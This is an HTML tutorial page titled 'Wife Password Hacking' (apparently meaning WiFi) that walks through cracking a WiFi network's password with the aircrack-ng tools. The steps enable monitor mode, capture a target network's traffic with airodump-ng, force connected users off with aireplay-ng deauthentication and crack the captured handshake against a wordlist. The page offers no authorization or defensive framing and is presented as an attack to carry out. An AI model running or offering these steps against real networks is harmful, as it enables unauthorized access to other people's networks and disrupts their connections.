<!DOCTYPE html>
<html>

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title></title>

</head>

<body>
  <header style="background:black;height: 20px;text-align: center;color: white;" >
    <h3>Wife Password Hacking </h3>
  </header>
  <div class="mainbox">
      <h1 align="center">Step 1</h1><hr>
      <h3>Requirements!!!</h3>
      <ol>
        <li>Linux Machine</li>
        <ul>
          <li>Kali Linux</li>
          <li>Parrot</li>
        </ul>
        <li>WiFi Adapter</li>
        <ul>
          <li>Which Support Monitor Mode And Packet Injection Mode</li>
        </ul>
      </ol>
       <h4>Let The Hacking Begin!</h4>
       <p>First Change Your Adapter Mode Code
         <div class="codebox">
           <span></span><code>iwconfig</code>
         </div>
         To see Adapter Mode To Enable Monitor Mode Code
         <div class="codebox">
          <span></span><code>sudo ifconfig wlan0 down</code>
         </div>
         wlan0 There Your Adapter Name Next Code
         <div class="codebox">
          <span></span>
          <code>sudo iwconfig wlan0 mode monitor</code>
         </div>
         Monitor Mode is Enabled Next code
         <div class="codebox">
           <span></span><code>sudo ifconfig wlan0 up</code>
         </div>
         </p>
    
  </div>
  <div class="mainbox">
       <h1 align="center">Step 2</h1><hr>
       <p>Code This
       <div class="codebox">
         <span></span><code>aireplay-ng --test wlan0</code>
       </div>
       It Scan All Available WiFi Networks Than Copy Bssid And Note Channel No. Next Code
       <div class="codebox">
         <span></span>
       <code>
           airodump-ng --bssid *bssid* --channel* channel_no* --write *output file name* wlan0</code>
       </div>
       Hit Enter You Got List Of Connected Users With Your Target WiFi Open New Tab Code
       <div class="codebox">
         <span></span>
         <code>aireplay-ng --deauth 10 -a *bssid* -c *Station_id* wlan0</code>
       </div>
       Our Password File Capture With Name Of *output file name* Next Code
       <div class="codebox">
         <span></span>
         <code>aircrack-ng file_name -w wordlist_pat!h</code>
       </div>
       When You Click Enter Password Cracking Start Leave it Wait for your pass****
       </p>
  </div>
    <style>

    body{
      background: #0f222f;
    }
    .mainbox{
      width: 90%;
      margin: 5%;
      background: linear-gradient(#fff2, transparent);
      border: 1px solid rgba(255, 255, 255, 0.1);
      box-shadow: 0 25px 25px rgba(0,0,0,0.25);
      backdrop-filter: blur(10px);
      color: white;
      border-radius: 10px;
      padding: 2px 20px;
    }
    .codebox{
      width: 90%;
      height: 30px;
      background: #0f222f;
      margin: 10px;
      border: 1px solid rgba(255, 255, 255, 0.1);
      border-radius: 5px;
      position: relative;
      overflow: auto;
      
    }
    .codebox span{
      width: 5px;
      height: 100%;
      background: greenyellow;
      display: block;
      border-radius: 5px 0 0 5px;
      float: left;
    }
    code{
      margin: 8px 10px;
      position: absolute;
    }
    </style>
</body>

</html>